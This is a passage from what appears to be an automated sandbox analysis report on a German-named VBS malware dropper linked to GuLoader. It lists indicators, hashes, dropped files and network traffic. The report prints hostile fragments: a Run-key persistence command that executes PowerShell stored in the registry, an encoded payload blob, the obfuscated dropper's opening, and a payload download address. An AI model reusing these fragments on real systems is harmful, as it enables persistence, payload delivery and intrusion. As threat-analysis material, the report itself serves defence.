                        08:52:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)
                        09:51:28API Interceptor1x Sleep call for process: wscript.exe modified
                        09:51:36API Interceptor115x Sleep call for process: powershell.exe modified
                        09:53:09API Interceptor1x Sleep call for process: WerFault.exe modified
                        09:53:26API Interceptor7x Sleep call for process: clip.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        87.121.105.5401105751.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        bg.microsoft.map.fastly.netinvoice PDF -2024.gz.vbsGet hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        Pedido-Faturado-398731.msiGet hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        LFfjUMuUFU.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                        • 199.232.210.172
                        https://www.67rwzb.cn/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        https://jingxinwl.com/Get hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        https://nthturn.com/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        https://bshgjc.com/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        https://www.uhnrya.cn/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        https://portal.cpscompressors.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                        • 199.232.214.172
                        https://www.soqsrkk.cn/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        NET1-ASBGRFQ-M310 .exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                        • 94.156.79.214
                        REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 87.121.105.184
                        Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                        • 87.121.105.163
                        01105751.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 87.121.105.54
                        Aqua.x86-20240502-1008.elfGet hashmaliciousUnknownBrowse
                        • 94.156.79.215
                        Aqua.arm7-20240502-1008.elfGet hashmaliciousMiraiBrowse
                        • 94.156.79.215
                        yibSQnyAI7.elfGet hashmaliciousMirai, OkiruBrowse
                        • 93.123.85.46
                        ryOgrdefvB.elfGet hashmaliciousMirai, OkiruBrowse
                        • 93.123.85.46
                        kdTZ0vraR2.elfGet hashmaliciousMirai, OkiruBrowse
                        • 93.123.85.46
                        jj5TL5MXzK.elfGet hashmaliciousMirai, OkiruBrowse
                        • 93.123.85.46

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kOAlByYcnQDKnTpl_327026411039ada1632c02759e63f9f9a873f8f_65f2932f_f5595536-7500-416e-9633-5d6e840a3c88\Report.wer

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8393176096147916
                        Encrypted:false
                        SSDEEP:384:uS+oul4HVBU/eAnAlj8zuiFhY4IO8mWA7L:uSXuaVBU/PAlj8zuiFhY4IO8m3
                        MD5:BEB077592AECE36023F010442C805E84
                        SHA1:1FB3A94D9D8AE435F09053C700AB8CB8F81A343D
                        SHA-256:667628773B1B7E14316348E502A5827918F9225C259024E86206C689C85A23E7
                        SHA-512:39295ED46327B55B0C8237F9B2C6E165AF38C75DD569D37E4DEBD3AA62282D4B5FD709DDDE01A9C3F5EC13C6EF6C3407306D1559ABC9A1D7ACAE24E892A9EAB1
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.8.2.7.7.5.4.6.8.5.1.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.8.2.7.7.8.7.0.2.8.8.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.5.9.5.5.3.6.-.7.5.0.0.-.4.1.6.e.-.9.6.3.3.-.5.d.6.e.8.4.0.a.3.c.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.6.2.9.f.b.a.-.5.d.6.d.-.4.7.4.9.-.8.5.6.0.-.a.e.d.9.f.2.c.2.a.6.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.O.A.l.B.y.Y.c.n.Q.D.K.n.T.p.l.L.R.j.S.H.z.G.y.P.q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.a.a.e.e.-.d.b.d.b.f.7.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.b.1.d.4.1.b.0.1.2.d.b.1.c.0.6.6.b.e.5.5.9.d.4.5.a.1.9.f.2.c.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.k.O.A.l.B.y.Y.c.n.Q.D.K.n.T.

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E0F.tmp.dmp

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Sat May 4 07:52:55 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):35878
                        Entropy (8bit):1.91497304949868
                        Encrypted:false
                        SSDEEP:192:Bc3IW6ecq3OKFsfThuLV2U3zcBcPpKbsl:W4W6me9ThuLV2CpPpN
                        MD5:DE03206F1D8E52A2DEA5FD47C66E0932
                        SHA1:E6EDA1F7B05669A7CD481C058F2AEDFBCC80BD0E
                        SHA-256:3BD1B2DA25AEB771069DF090A76962B8F0229CE1FC5E0A39D380E011EA3DC890
                        SHA-512:5887D2AB3CD2CCD9FB2B706792DD46F0BD7D00D8150A004E3D8765ED5B14905F77968E051EDDE516BAD26657CC92CD6C24C5ED6AE592A41F9F9AE79109911253
                        Malicious:false
                        Preview:MDMP..a..... .......W.5f............d...............l.......................T.......8...........T...........H....x......................................................................................................eJ..............GenuineIntel............T.............5f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F87.tmp.WERInternalMetadata.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8492
                        Entropy (8bit):3.7142679300063386
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJq4EH6Ihv6Y9FSUGaETgmfEZfprp89bHIsf0ENm:R6lXJqTH6Ihv6Y/SUGaETgmfEZUH7f0D
                        MD5:6C813D29066B22260AD625FFA43AE319
                        SHA1:FAEB0E2B0D4E3E41344F9DCFE3629F322F558236
                        SHA-256:94A7A1F3A02642E812FFAC6DA9D3D66423B7B51712FBCDE3B593BA984DC0DA11
                        SHA-512:FCC4C285ACE50FD5A7CF991C7ABE05DEC0ADC4C5E7924E7622820CEAB834C36F0689CA78C03D00A104FDC594E79E8042CF1F94982986335A4244EAB24F346D59
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7583.tmp.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4800
                        Entropy (8bit):4.564903432445394
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsPJg77aI9yFWpW8VY+vYm8M4JiP5HFdhL+q8vv5H2bJ070Qd:uIjfxI7k07VxyJiPfLKvIF070Qd
                        MD5:F1C4B3DE8336583033A531F5E7D20692
                        SHA1:A6ACC4E407E5A7CE4EE31DED4502C2C83732DE6E
                        SHA-256:BD15C9B2C854491CF7378E1BA8750456F7A7727B8DA5182B4E9D7E9EF1DCA603
                        SHA-512:4D7DDED30432FC2D75C042B838E9A9E4370671AF69078341783F74A0187C379AE34A3D56984216530DEBE0EBA165940BBEA8B4C192D5A25FD59A0B74998214FA
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="308095" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                        Download File
                        Process:C:\Windows\System32\wscript.exe
                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                        Category:dropped
                        Size (bytes):69993
                        Entropy (8bit):7.99584879649948
                        Encrypted:true
                        SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                        MD5:29F65BA8E88C063813CC50A4EA544E93
                        SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                        SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                        SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                        Malicious:false
                        Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                        Download File
                        Process:C:\Windows\System32\wscript.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):330
                        Entropy (8bit):3.236117150252365
                        Encrypted:false
                        SSDEEP:6:kKlN/lEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt://lbkPlE99SNxAhUeVLVt
                        MD5:362AB1917BCD50951026BA0396EFACD6
                        SHA1:B896A508DAC0D9007BF9B8998131175C21BBEF1B
                        SHA-256:E3E17F8B4CA9B30A984E848404CB1FA40095DAA406CB2C6FC71F773CBF16BBAE
                        SHA-512:D0A1FC161BD3CE94F255DD467A204E5D16655542CE0E8137BE66743561C02E3E334917733A57DF4B4D49C81ACCD68A9682EB13D07093A7D6D18904C4371F199C
                        Malicious:false
                        Preview:p...... ........Y.9.....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):11608
                        Entropy (8bit):4.886255615007755
                        Encrypted:false
                        SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                        MD5:C7F7A26360E678A83AFAB85054B538EA
                        SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                        SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                        SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                        Malicious:false
                        Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:Nlllulbnolz:NllUc
                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                        Malicious:false
                        Preview:@...e................................................@..........

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13umbca1.mvr.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gehvpr2m.eg1.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_viun0yu2.5ef.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wykkg2hr.oea.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Roaming\Vaterpassenes24.Acc

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):416656
                        Entropy (8bit):5.962939321179034
                        Encrypted:false
                        SSDEEP:12288:V6rmeZEe7zWTcJLymuJu0dmnCGS1rc6+67:FePWTBzlB77
                        MD5:E504A53EE3C0D21CF89C447A0497C6E1
                        SHA1:711325CAD1137834E4593C40BCDA3E7C60902A8B
                        SHA-256:06364E5F7100395C2A5862CB01DC13B7C781EAFC641492BB60C80FB1391A2CEE
                        SHA-512:3A0832F64401D0EE52144F914F649983F9ED619761131F20B88070349229A26C97477EEE418D3D33841391D97E8C43B1D045FDE8075572B3BA796850D50FEA3D
                        Malicious:false
                        Preview:6wI1xesCK/u7aQkQAHEBm3EBmwNcJARxAZvrAh49uf6i81ZxAZtxAZuB8eXbHc1xAZvrAhEygfEbee6b6wLoIXEBm+sCG/frAsK5uucSs7JxAZtxAZtxAZtxAZsxyusCYoFxAZuJFAtxAZvrAkbW0eJxAZvrAoe+g8EEcQGb6wLyDIH5V5nBBHzM6wKBkOsCXIaLRCQEcQGbcQGbicNxAZvrAlttgcPaNfcB6wJX4OsCo1u68T8aIusCJbRxAZuB8jco5tfrAqXLcQGbgcI66AMK6wLgP+sCPRNxAZvrAiUm6wKMkOsC8USLDBBxAZvrAvmRiQwTcQGb6wIPwEJxAZtxAZuB+uxWBAB11XEBm3EBm4lcJAzrAk+hcQGbge0AAwAAcQGb6wJmp4tUJAhxAZvrArvTi3wkBHEBm+sCu1GJ63EBm3EBm4HDnAAAAHEBm3EBm1PrAinE6wINl2pA6wKpo+sCgIWJ63EBm3EBm8eDAAEAAACw1ATrApOzcQGbgcMAAQAAcQGbcQGbU3EBm3EBm4nr6wJuJ3EBm4m7BAEAAHEBm3EBm4HDBAEAAHEBm3EBm1NxAZvrAgIzav9xAZtxAZuDwgVxAZtxAZsx9nEBm3EBmzHJcQGb6wJ/UIsa6wJcd+sCh45B6wJhA+sC34M5HAp18usCn2VxAZtGcQGb6wL964B8Cvu4ddzrAnFO6wLp5YtECvzrAkHz6wKW4inwcQGbcQGb/9LrAuTVcQGbuuxWBABxAZtxAZsxwOsCyN3rAjxli3wkDOsCRFPrAscQgTQHQEC+5+sCqfXrAuvCg8AE6wIRJusCxVE50HXi6wKRhOsC4WeJ+3EBm3EBm//X6wJdMOsC/NLJpTdier9BGPi9Euy8bfDZN2eLV4CaGOKhFA9qaYQ1Ynq/QRjErOtupfkKcv63PxbpusHNtoNQZrELW5bgwVfZyvDDDFSK9PE0enfMhH9zLQpWyt2Ja3rYjYf66kB5wobiwcrq

                        Static File Info

                        General

                        File type:ASCII text, with very long lines (544), with CRLF line terminators
                        Entropy (8bit):5.158760331338767
                        TrID:
                          File name:Zahlungsbeleg 202405029058.vbs
                          File size:214'551 bytes
                          MD5:913fa02445aa8092996ad3f000aa1ea1
                          SHA1:c29022193884baeb4aad8a94884995ea80bdeb25
                          SHA256:f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78
                          SHA512:7bedf67bcf7fc15b6c3ce845fcbec3e7a936ebd72efa9a0b386eec5d15d7c1560b87aabb729114016862742c4e40299a7c4dc3ca810af06510b4d9b352196263
                          SSDEEP:6144:PJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQK9Y:hcKJkRH3E
                          TLSH:5324B3E3CF0A36181F8A2FD5A865CD828AF741B171112478D5EED6EDA183EACC1F8D15
                          File Content Preview:.. ..Rem stningsled aporobranchian lorgnettere brnesygdommes. udliciterings.. .. .. .. .. ..Rem Harmoniseres! ildnendes placarder swaddler sjuskedorter..U4 = U4 + "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';gronchiction Tyknende($Frontotemp

                          File Icon

                          Icon Hash:68d69b8f86ab9a86

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 4, 2024 09:51:38.724422932 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.030324936 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.030399084 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.030721903 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.335364103 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.338871956 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.338915110 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.338999987 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.339021921 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339037895 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339051008 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339091063 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.339121103 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339135885 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339150906 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339159966 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.339165926 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339179039 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.339186907 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.339214087 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643627882 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643644094 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643661976 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643673897 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643686056 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643743038 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643752098 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643752098 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643754959 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643769026 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643776894 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643781900 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643794060 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643805981 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643809080 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643820047 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643835068 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643848896 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643874884 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643888950 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643901110 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643934965 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643944979 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643954992 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643968105 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643970966 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:39.643980980 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:39.643994093 CEST804973187.121.105.54192.168.2.4
